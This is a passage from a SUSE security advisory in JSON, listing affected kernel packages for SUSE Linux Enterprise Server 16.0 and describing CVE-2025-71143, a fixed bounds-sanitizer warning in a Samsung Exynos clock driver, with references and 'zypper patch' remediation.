"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
